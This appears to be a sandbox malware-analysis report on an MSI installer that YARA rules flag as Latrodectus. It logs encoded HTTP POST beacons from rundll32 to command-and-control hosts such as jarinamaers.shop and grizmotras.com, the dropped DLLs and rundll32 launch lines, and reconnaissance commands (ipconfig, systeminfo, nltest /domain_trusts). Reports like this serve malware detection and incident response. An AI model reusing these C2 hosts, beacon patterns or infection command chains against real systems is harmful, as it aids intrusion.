                                                                2024-04-26 00:48:24 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 56 6b 6c 6d 79 37 39 64 54 54 4c 68 4f 50 56 38 33 30 37 43 56 58 78 71 61 42 6e 4c 41 48 36 41 50 53 63 65 4f 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c
                                                                Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
                                                                2024-04-26 00:48:31 UTC572INHTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFfOhAqVrZyNNbnUiD4pf0kZEM1cDgVjprdMReps%2FsFb6hdsXeVvxgH0VG7%2Fy6AJec3qyTPWHePQrkDFOmMfUO9asytMnCfSUUMryvotXBRr6vUPTzMt%2BE1nRLSm3wdvL9md"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a291287fc46dd3-MIA
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-04-26 00:48:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549716104.21.46.754432624C:\Windows\System32\rundll32.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-04-26 00:48:33 UTC229OUTPOST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: jarinamaers.shop
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
                                                                2024-04-26 00:48:33 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 56 6b 6c 6d 79 37 39 64 54 54 4c 68 4f 50 56 38 33 30 37 43 56 58 78 71 61 42 6e 4c 41 48 36 41 50 53 63 65 4f 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c
                                                                Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
                                                                2024-04-26 00:48:38 UTC574INHTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orDHPeiOMuFrt9YYHiHNvqnOLePVM3zJe2viwCgSp%2FuWJQj3IfrWIdcV6w%2BLWUHo01gtdmrdjG1sCovD7odV5bx5hvTJFS8ks1035uing%2BjroL%2BSLvSHeHEAbLLXd08tp2QX"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a2915f785409d2-MIA
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-04-26 00:48:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.549717104.21.46.754432624C:\Windows\System32\rundll32.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-04-26 00:48:38 UTC229OUTPOST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: jarinamaers.shop
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
                                                                2024-04-26 00:48:38 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 56 6b 6c 6d 79 37 39 64 54 54 4c 68 4f 50 56 38 33 30 37 43 56 58 78 71 61 42 6e 4c 41 48 36 41 50 53 63 65 4f 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c
                                                                Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
                                                                2024-04-26 00:48:44 UTC576INHTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VpTBdjA5RSFhRQAUPTjOezk91ItbQKgquQPF5%2B4sEe3CHSUjUCnmEJFdDI0p6Ok7FTUm0eG%2Bop%2FiLKJbhC1a555w3FrReQc5qjHicgNNCp0X5CKC%2FCDwlo7GeW%2F84VPK0e4S"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a2918298fadad9-MIA
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-04-26 00:48:44 UTC162INData Raw: 39 63 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 69 7a 64 35 5a 48 39 71 74 56 32 58 35 45 38 74 46 4a 69 39 2b 4d 6e 69 58 44 36 41 4a 55 75 7a 5a 4f 2b 2b 42 47 72 63 6e 41 3d 3d 0d 0a
                                                                Data Ascii: 9cQhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnA==
                                                                2024-04-26 00:48:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549718172.67.219.284432624C:\Windows\System32\rundll32.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-04-26 00:48:45 UTC227OUTPOST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: grizmotras.com
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
                                                                2024-04-26 00:48:45 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 56 6b 6c 6d 79 37 39 64 54 54 4c 68 4f 50 56 38 33 30 37 43 56 58 78 71 61 42 6e 4c 41 48 36 41 50 53 63 65 4f 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d
                                                                Data Ascii: YjOeEyiMk3RvE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
                                                                2024-04-26 00:48:49 UTC576INHTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=viGrGAVF8zdzBCJQqKbPVZsJkI4fDrIYFeZHkXgYC4o68QPWcZc3DxC2DBTlPuHpIhJh%2BSngIaxrhYpKxxJkW5BjyL6btF%2BcO2%2FcgbzdepjGKTz8tZS31zWnagligiRetQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a291aceb1c8dd0-MIA
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-04-26 00:48:49 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                2024-04-26 00:48:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.549719172.67.219.284432624C:\Windows\System32\rundll32.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-04-26 00:48:51 UTC227OUTPOST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: grizmotras.com
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
                                                                2024-04-26 00:48:51 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 75 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 56 6b 6c 6d 79 37 39 64 54 54 4c 68 4f 50 56 38 33 30 37 43 56 58 78 71 61 42 6e 4c 41 48 36 41 50 53 63 65 4f 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d
                                                                Data Ascii: YjOeEyiMk3RuE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
                                                                2024-04-26 00:48:57 UTC578INHTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=79CxeEATA5%2FJlEt5nXVUpNwRz7KdDHdgOhqhlItrVmFkdgB404BzZ3UCKgovMZwqkevqHq73uQ99Curq%2FmIIyOQgxL4RHrh9rTD6uLsRR%2Bl7knsRic3kz7i7lOo%2FJZK5nA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a291d2fbbd74b6-MIA
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-04-26 00:48:57 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                2024-04-26 00:48:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:02:46:47
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\msiexec.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi"
                                                                Imagebase:0x7ff6f20d0000
                                                                File size:69'632 bytes
                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:02:46:47
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\msiexec.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                Imagebase:0x7ff6f20d0000
                                                                File size:69'632 bytes
                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:3
                                                                Start time:02:46:47
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E4F2088FE7B6F79163C652AEB7DCBA5B C
                                                                Imagebase:0x850000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:02:46:48
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 2B25E5241F8800AB2020C808DD90D583
                                                                Imagebase:0x850000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:02:46:49
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\Installer\MSID8B1.tmp
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Installer\MSID8B1.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                                                                Imagebase:0xb20000
                                                                File size:399'328 bytes
                                                                MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                • Detection: 0%, Virustotal, Browse
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:02:46:49
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                                                                Imagebase:0x7ff648c90000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.1996565614.000001FB3AB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:02:46:49
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq
                                                                Imagebase:0x7ff648c90000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3239594516.000002473B520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3239003691.0000005536378000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.2918615287.000002473B890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3239304282.0000024739A40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3072398215.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3001961858.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.2854188056.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3239248195.0000024739A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:02:46:50
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq
                                                                Imagebase:0x7ff648c90000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2009341046.00000210FE9F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2009386305.00000210FEA00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:02:48:43
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c ipconfig /all
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:02:48:43
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:02:48:43
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\ipconfig.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:ipconfig /all
                                                                Imagebase:0x7ff784320000
                                                                File size:35'840 bytes
                                                                MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:02:48:44
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c systeminfo
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:02:48:44
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:02:48:44
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\systeminfo.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:systeminfo
                                                                Imagebase:0x7ff647f00000
                                                                File size:110'080 bytes
                                                                MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:02:48:44
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff6ef0c0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:19
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c nltest /domain_trusts
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:21
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\nltest.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:nltest /domain_trusts
                                                                Imagebase:0x7ff7a6b60000
                                                                File size:540'672 bytes
                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:22
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c nltest /domain_trusts /all_trusts
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:23
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:24
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\nltest.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:nltest /domain_trusts /all_trusts
                                                                Imagebase:0x7ff7a6b60000
                                                                File size:540'672 bytes
                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:25
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
